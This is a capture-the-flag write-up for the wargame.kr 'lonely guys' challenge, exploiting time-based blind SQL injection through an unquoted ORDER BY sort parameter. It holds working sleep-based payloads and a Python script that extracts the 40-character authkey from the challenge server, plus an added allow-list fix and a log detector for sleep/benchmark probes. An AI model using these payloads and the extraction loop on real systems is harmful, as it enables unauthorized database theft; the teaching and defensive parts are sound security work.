lonely guys
Blind SQLi challenge.
Can you SQLi with 'order by' in expression?
Let's look only at the core part of the code.
<?php
// The sort direction is taken straight from the POST body and defaults to "asc".
if(isset($_POST['sort'])){
    $sort=$_POST['sort'];
}else{
    $sort="asc";
}
// The flag is regenerated on every request and stored in authkey.authkey.
mysql_query("update authkey set authkey='".auth_code('lonely guys')."'");
// Escaping only neutralises quote characters; $sort is interpolated unquoted
// into the ORDER BY clause, so the escaping does not prevent injection here.
$sort = mysql_real_escape_string($sort);
$result=mysql_query("select * from guys_tbl order by reg_date $sort");
while($row=mysql_fetch_array($result)){
    echo "<tr><td>$row[1]</td><td>$row[2]</td></tr>";
}
?>
The sort value is taken from POST and the following query is executed:
SELECT * FROM guys_tbl ORDER BY reg_date $sort
mysql_real_escape_string only escapes quote characters, and $sort is placed into the query without surrounding quotes, so no quote is needed to break out and the escaping provides no protection.
A subquery can be placed in a column position after ORDER BY:
order by column, column, (subquery), ....
Using IF, a time-based SQL injection was attempted.
The flag is in the authkey column of the authkey table.
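Why the escaping on the page does not help, and what does, as an added example that is not part of the original writeup. It uses an in-memory sqlite3 database with a constructed copy of the two tables (the real schema beyond the column names used on the page is an assumption), an escape_string helper that mimics what mysql_real_escape_string does to a value, and an allow-list mapping for the sort direction as the hardened form.

```python
import re
import sqlite3

# Constructed stand-in for the challenge's tables (assumption: only the column
# names used on the page are known; the rest is made up for the demo).
SCHEMA = """
create table guys_tbl (id integer primary key, name text, reg_date text);
create table authkey (authkey text);
insert into guys_tbl (name, reg_date) values ('a', '2020-01-01'), ('b', '2020-01-02');
insert into authkey values ('0123456789abcdef0123456789abcdef01234567');
"""


def escape_string(value):
    """Mimic mysql_real_escape_string: backslash-escape quotes and backslashes.
    Commas, parentheses and SQL keywords are left untouched."""
    return re.sub(r"([\\'\"])", r"\\\1", value)


def order_by_escaped(conn, sort):
    """The page's pattern: escape the value, then interpolate it unquoted into
    the ORDER BY clause. The escaping never fires because the value needs no
    quote to change the query."""
    sort = escape_string(sort)
    return conn.execute(f"select * from guys_tbl order by reg_date {sort}").fetchall()


# Hardened form: the only thing a client may choose is one of two fixed words.
ALLOWED_SORT = {"asc": "ASC", "desc": "DESC"}


def order_by_allowlisted(conn, sort):
    """Map the untrusted value onto a fixed direction keyword; anything else is
    rejected before it ever reaches the SQL string."""
    direction = ALLOWED_SORT.get(sort.lower())
    if direction is None:
        raise ValueError("invalid sort direction")
    return conn.execute(f"select * from guys_tbl order by reg_date {direction}").fetchall()


def demo():
    """Run both builders against a subquery in the sort value and report what
    each one does with it."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    probe = ",(select length(authkey) from authkey)"
    results = {}
    # The escaped build executes the subquery as an extra ORDER BY expression.
    results["escaped_accepts_subquery"] = len(order_by_escaped(conn, probe)) == 2
    # The allow-listed build refuses the same value.
    try:
        order_by_allowlisted(conn, probe)
        results["allowlist_rejects_subquery"] = False
    except ValueError:
        results["allowlist_rejects_subquery"] = True
    # Legitimate input still works: "desc" puts the newest row first.
    results["allowlist_desc_first"] = order_by_allowlisted(conn, "desc")[0][1]
    return results


if __name__ == "__main__":
    print(demo())
```

Bind parameters are not an alternative here: a placeholder can only carry a value, and a bound "desc" would sort by a constant string rather than change direction. Direction keywords and column names must therefore come from a server-side allow-list, never from the request.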
import urllib.parse
import urllib.request

key = ""


def chk(payload):
    # Send the payload as the POST "sort" parameter and return the response body.
    url = "http://wargame.kr:8080/lonely_guys/index.php"
    data = urllib.parse.urlencode({"sort": payload}).encode()
    request = urllib.request.Request(url, data)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    with urllib.request.urlopen(request) as response:
        data = response.read()
    print(payload)
    print(data)
    return data


# Is the authkey non-empty? True -> sleep(1), false -> 1.
payload = ",if(0<(select length(authkey) from authkey),sleep(1),1)"
chk(payload)
If the condition is true it sleeps for 1 second; if false it returns 1.
,if(40=(select length(authkey) from authkey),sleep(1),1)
This shows that the length of authkey is 40.
Now extract it one character at a time.
,if(48=ord((select substr(authkey,1,1) from authkey)),sleep(1),1)
import time
import urllib.parse
import urllib.request

charset = "0123456789abcdefghijklmnopqrstuvwxyz"
key = ""


def chk(payload):
    # Send the payload as the POST "sort" parameter and return the response body.
    url = "http://wargame.kr:8080/lonely_guys/index.php"
    data = urllib.parse.urlencode({"sort": payload}).encode()
    request = urllib.request.Request(url, data)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    with urllib.request.urlopen(request) as response:
        data = response.read()
    print(payload)
    #print(data)
    return data


# authkey is 40 characters long; test each position against every charset character.
for i in range(40):
    for j in range(len(charset)):
        payload = ",if(" + str(ord(charset[j])) + "=ord((select substr(authkey," + str(i + 1) + ",1) from authkey)),sleep(1),1)"
        start = time.time()
        chk(payload)
        end = time.time() - start
        # A response that took more than a second means sleep(1) ran, i.e. the guess was right.
        if end > 1:
            key += charset[j]
            print("[*] Find Password!! Password is [" + key + "] ")
            break
        else:
            print("[-] Fail!")
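From the defender's side, the extraction loop above leaves a distinctive trace: many requests from one client whose sort parameter is not "asc"/"desc", some of them calling a timing function and taking about a second to answer. The detection below is an added example, not part of the original writeup; the log format and the log lines are constructed (an application that records the raw sort value and the request duration is an assumption), and the thresholds are illustrative.

```python
import re
from collections import defaultdict

# Constructed application log lines (not from the page): timestamp, client,
# the raw POST "sort" value, and how long the request took in milliseconds.
LOG_LINES = [
    '2020-01-06T10:00:01 10.0.0.5 sort="asc" took=12ms',
    '2020-01-06T10:00:02 10.0.0.5 sort="desc" took=11ms',
    '2020-01-06T10:00:03 10.0.0.9 sort=",if(40=(select length(authkey) from authkey),sleep(1),1)" took=1013ms',
    '2020-01-06T10:00:05 10.0.0.9 sort=",if(48=ord((select substr(authkey,1,1) from authkey)),sleep(1),1)" took=1009ms',
    '2020-01-06T10:00:06 10.0.0.9 sort=",if(49=ord((select substr(authkey,1,1) from authkey)),sleep(1),1)" took=14ms',
    '2020-01-06T10:00:07 10.0.0.7 sort="reg_date" took=15ms',
]

LINE_RE = re.compile(r'^(\S+) (\S+) sort="(.*)" took=(\d+)ms$')
ALLOWED = {"asc", "desc"}
# MySQL functions commonly used to make a query stall on purpose.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def parse(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, sort, took = m.groups()
    return {"ts": ts, "client": client, "sort": sort, "took_ms": int(took)}


def analyse(lines, slow_ms=900, burst=2):
    """Return (rule, client, detail) alerts for: sort values outside the
    allow-list, sort values calling a timing function, and clients with
    repeated slow responses (the signature of a time-based oracle)."""
    alerts = []
    slow_per_client = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["sort"].lower() not in ALLOWED:
            alerts.append(("unexpected_sort_value", rec["client"], rec["sort"]))
        if TIME_FUNCS.search(rec["sort"]):
            alerts.append(("time_based_probe", rec["client"], rec["sort"]))
        if rec["took_ms"] >= slow_ms:
            slow_per_client[rec["client"]] += 1
    for client, n in slow_per_client.items():
        if n >= burst:
            alerts.append(("slow_response_burst", client, f"{n} responses >= {slow_ms}ms"))
    return alerts


if __name__ == "__main__":
    for alert in analyse(LOG_LINES):
        print(alert)
```

The first rule is the one that matters once the allow-list fix is in place: any sort value other than the two permitted words is already rejected by the application, so logging and alerting on those rejections catches the probing without relying on the attacker's choice of timing function.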